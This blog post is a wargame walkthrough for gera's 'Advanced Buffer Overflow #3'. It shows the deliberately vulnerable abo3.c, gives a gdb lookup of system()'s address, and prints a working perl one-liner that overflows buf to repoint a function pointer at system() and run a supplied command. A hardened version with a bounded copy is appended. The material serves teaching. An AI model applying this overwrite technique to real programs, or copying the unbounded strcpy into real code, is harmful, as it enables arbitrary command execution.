Sunday, July 4, 2010

Advanced Buffer Overflow #3

/* abo3.c                                       *
 * specially crafted to feed your brain by gera */

/* This'll prepare you for The Next Step */

int main(int argv,char **argc) {
	extern system,puts;                          /* implicit-int externs; argv/argc are deliberately swapped */
	void (*fn)(char*)=(void(*)(char*))&system;   /* fn starts out pointing at system() */
	char buf[256];

	fn=(void(*)(char*))&puts;                    /* ...and is then repointed at puts() */
	strcpy(buf,argc[1]);                         /* unbounded copy: an argc[1] longer than buf runs into fn */
	fn(argc[2]);                                 /* whatever fn points at now is called with argc[2] */
	exit(1);
}

main's stack frame looks something like this (higher addresses at the top):

    eip   (saved return address)
    ebp   (saved frame pointer)
    fn
    .
    .
    buf   (256 bytes; strcpy() writes upwards from here, towards fn)

fn is a function pointer that initially points at system() and is then changed to point at puts(). The overflow has to reset it so that it points back to system(), which is then called with argc[2] as its argument.

First order of business is to figure out the address of system():

(gdb) x/x system
0x8048318 <system>:	0x96a425ff

Note that the bytes stored there (ff 25 a4 96 ... in memory order) are a jmp through the GOT, so 0x8048318 is abo3's own PLT stub for system(), inside the binary itself, rather than the routine in libc.

Next order is to overflow buf and overwrite fn to point back to system():

268 bytes get us to the start of fn: buf is 256 bytes, and the compiler leaves another 12 bytes between the end of buf and fn. The address is written little-endian, which is why 0x08048318 appears as "\x18\x83\x04\x08".

$ abo3 `perl -e 'print "A" x 268 . "\x18\x83\x04\x08"';` 'echo "you win!"'
you win!
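As an added counterpart to gera's program (example code of mine, not part of the original post), here is an abo3 body whose copy is bounded: the "A" x 268 argument from the run above is refused before it can reach fn. try_with_length() is an assumed test helper that builds such an argument.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 256

/* Bounded replacement for the strcpy() in abo3.c: copies src into dst only
 * when it fits together with its NUL terminator, otherwise leaves dst alone.
 * Returns 0 on success, -1 if src is too long. */
int safe_copy(char *dst, size_t dst_size, const char *src)
{
    size_t len = strlen(src);
    if (len >= dst_size)
        return -1;
    memcpy(dst, src, len + 1);
    return 0;
}

/* Hardened abo3 body (added example, not gera's program); arg1 and arg2 play
 * the roles of argc[1] and argc[2]. The copy is bounded, so an oversized arg1
 * is refused instead of being written past buf into fn and the saved return
 * address. fn is const only to drop the legitimate reassignment; it is the
 * length check that keeps the overflow away from it.
 * Returns 0 when the copy succeeded and fn was called, 1 if arg1 was refused. */
int abo3_hardened(const char *arg1, const char *arg2)
{
    int (*const fn)(const char *) = puts;   /* same type as puts(), no cast needed */
    char buf[BUF_SIZE];

    if (safe_copy(buf, sizeof buf, arg1) != 0) {
        fprintf(stderr, "argument too long (%zu bytes, max %d)\n",
                strlen(arg1), BUF_SIZE - 1);
        return 1;
    }
    fn(arg2);
    return 0;
}

/* Test helper (constructed input): feeds an argument of n 'A's, as the
 * page's perl payload does with n = 268, and returns what abo3_hardened()
 * returned; -1 if n does not fit the helper's own scratch buffer. */
int try_with_length(size_t n)
{
    char arg[300];
    if (n >= sizeof arg)
        return -1;
    memset(arg, 'A', n);
    arg[n] = '\0';
    return abo3_hardened(arg, "you win?");
}
```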
